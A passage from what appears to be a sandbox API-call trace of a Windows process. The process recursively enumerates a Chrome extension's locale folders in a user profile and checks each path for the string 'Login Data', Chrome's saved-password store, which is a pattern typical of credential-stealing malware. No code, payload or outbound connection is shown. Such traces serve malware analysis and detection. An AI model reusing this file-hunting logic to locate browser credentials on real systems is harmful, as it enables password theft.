lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.716] GetProcessHeap () returned 0x8e0000 [0161.716] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.716] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt") returned 137 [0161.716] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt") returned 137 [0161.716] lstrlenW (lpString="\\*.*") returned 4 [0161.716] GetProcessHeap () returned 0x8e0000 [0161.716] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x91a0a8 [0161.717] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt" [0161.717] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\*.*" [0161.717] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x865abaf0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x865abaf0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x865abaf0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0161.717] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.717] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x865abaf0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x865abaf0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x865abaf0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="..", cAlternateFileName="")) returned 1 [0161.717] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.717] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.717] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x865abaf0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x865aa380, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xe4, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.717] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt") returned 137 [0161.717] lstrlenW (lpString="\\") returned 1 [0161.717] GetProcessHeap () returned 0x8e0000 [0161.717] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x116) returned 0x91b1d8 [0161.717] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt" [0161.717] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\" [0161.717] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\") returned 138 [0161.717] lstrlenW (lpString="messages.json") returned 13 [0161.717] GetProcessHeap () returned 0x8e0000 [0161.717] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x130) returned 0x91b2f8 [0161.717] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\" [0161.717] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\messages.json" [0161.717] VirtualQuery (in: lpAddress=0x91b1d8, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.717] GetProcessHeap () returned 0x8e0000 [0161.717] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1d8 | out: hHeap=0x8e0000) returned 1 [0161.717] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lt\\messages.json", lpSrch="Login Data") returned 0x0 [0161.717] VirtualQuery (in: lpAddress=0x91b2f8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.717] GetProcessHeap () returned 0x8e0000 [0161.717] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b2f8 | out: hHeap=0x8e0000) returned 1 [0161.718] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x865abaf0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x865aa380, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xe4, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.718] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.718] VirtualQuery (in: lpAddress=0x91a0a8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.718] GetProcessHeap () returned 0x8e0000 [0161.718] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91a0a8 | out: hHeap=0x8e0000) returned 1 [0161.718] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.718] GetProcessHeap () returned 0x8e0000 [0161.718] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0161.718] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x865abaf0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x865abaf0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x865abaf0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="lv", cAlternateFileName="")) returned 1 [0161.718] lstrcmpiW (lpString1="lv", lpString2=".") returned 1 [0161.718] lstrcmpiW (lpString1="lv", lpString2="..") returned 1 [0161.718] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.718] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.718] lstrlenW (lpString="\\") returned 1 [0161.718] GetProcessHeap () returned 0x8e0000 [0161.718] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0161.718] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales" [0161.718] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" [0161.718] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned 135 [0161.718] lstrlenW (lpString="lv") returned 2 [0161.718] GetProcessHeap () returned 0x8e0000 [0161.718] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x114) returned 0x925dd8 [0161.718] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\" [0161.718] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\", lpString2="lv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv" [0161.718] VirtualQuery (in: lpAddress=0x925cc0, lpBuffer=0x2de928, dwLength=0x1c | out: lpBuffer=0x2de928*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.718] GetProcessHeap () returned 0x8e0000 [0161.718] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925cc0 | out: hHeap=0x8e0000) returned 1 [0161.718] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv") returned 137 [0161.718] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv") returned 137 [0161.718] lstrlenW (lpString="\\*.*") returned 4 [0161.718] GetProcessHeap () returned 0x8e0000 [0161.718] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x11c) returned 0x91a0a8 [0161.719] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv" [0161.719] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv", lpString2="\\*.*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\*.*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\*.*" [0161.719] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\*.*", lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x865abaf0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x865abaf0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x865abaf0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName=".", cAlternateFileName="")) returned 0x8f9c00 [0161.743] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0161.743] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x865abaf0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x865abaf0, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x865abaf0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="..", cAlternateFileName="")) returned 1 [0161.743] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0161.743] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0161.743] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x865abaf0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x865aa380, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xe0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 1 [0161.743] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv") returned 137 [0161.743] lstrlenW (lpString="\\") returned 1 [0161.743] GetProcessHeap () returned 0x8e0000 [0161.743] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x116) returned 0x91b1d8 [0161.744] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv" [0161.744] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\" [0161.744] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\") returned 138 [0161.744] lstrlenW (lpString="messages.json") returned 13 [0161.744] GetProcessHeap () returned 0x8e0000 [0161.744] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x130) returned 0x91b2f8 [0161.744] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\" [0161.744] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\", lpString2="messages.json" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\messages.json") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\messages.json" [0161.744] VirtualQuery (in: lpAddress=0x91b1d8, lpBuffer=0x2de6b0, dwLength=0x1c | out: lpBuffer=0x2de6b0*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.744] GetProcessHeap () returned 0x8e0000 [0161.744] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b1d8 | out: hHeap=0x8e0000) returned 1 [0161.744] StrStrIW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\lv\\messages.json", lpSrch="Login Data") returned 0x0 [0161.744] VirtualQuery (in: lpAddress=0x91b2f8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91b000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xc000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.744] GetProcessHeap () returned 0x8e0000 [0161.744] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91b2f8 | out: hHeap=0x8e0000) returned 1 [0161.744] FindNextFileW (in: hFindFile=0x8f9c00, lpFindFileData=0x2de700 | out: lpFindFileData=0x2de700*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x865abaf0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x865aa380, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x86833250, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0xe0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="messages.json", cAlternateFileName="MESSAG~1.JSO")) returned 0 [0161.744] FindClose (in: hFindFile=0x8f9c00 | out: hFindFile=0x8f9c00) returned 1 [0161.744] VirtualQuery (in: lpAddress=0x91a0a8, lpBuffer=0x2de6bc, dwLength=0x1c | out: lpBuffer=0x2de6bc*(BaseAddress=0x91a000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0xd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.744] GetProcessHeap () returned 0x8e0000 [0161.744] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x91a0a8 | out: hHeap=0x8e0000) returned 1 [0161.744] VirtualQuery (in: lpAddress=0x925dd8, lpBuffer=0x2de934, dwLength=0x1c | out: lpBuffer=0x2de934*(BaseAddress=0x925000, AllocationBase=0x8e0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0161.744] GetProcessHeap () returned 0x8e0000 [0161.744] HeapFree (in: hHeap=0x8e0000, dwFlags=0x0, lpMem=0x925dd8 | out: hHeap=0x8e0000) returned 1 [0161.744] FindNextFileW (in: hFindFile=0x8f9bc0, lpFindFileData=0x2de978 | out: lpFindFileData=0x2de978*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x865d1c50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x865d1c50, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x865d1c50, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x69006c, dwReserved1=0x690065, cFileName="ms", cAlternateFileName="")) returned 1 [0161.744] lstrcmpiW (lpString1="ms", lpString2=".") returned 1 [0161.744] lstrcmpiW (lpString1="ms", lpString2="..") returned 1 [0161.744] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.744] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned 134 [0161.744] lstrlenW (lpString="\\") returned 1 [0161.744] GetProcessHeap () returned 0x8e0000 [0161.744] RtlAllocateHeap (HeapHandle=0x8e0000, Flags=0x8, Size=0x110) returned 0x925cc0 [0161.744] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales" [0161.745] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales", lpString2="\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\") 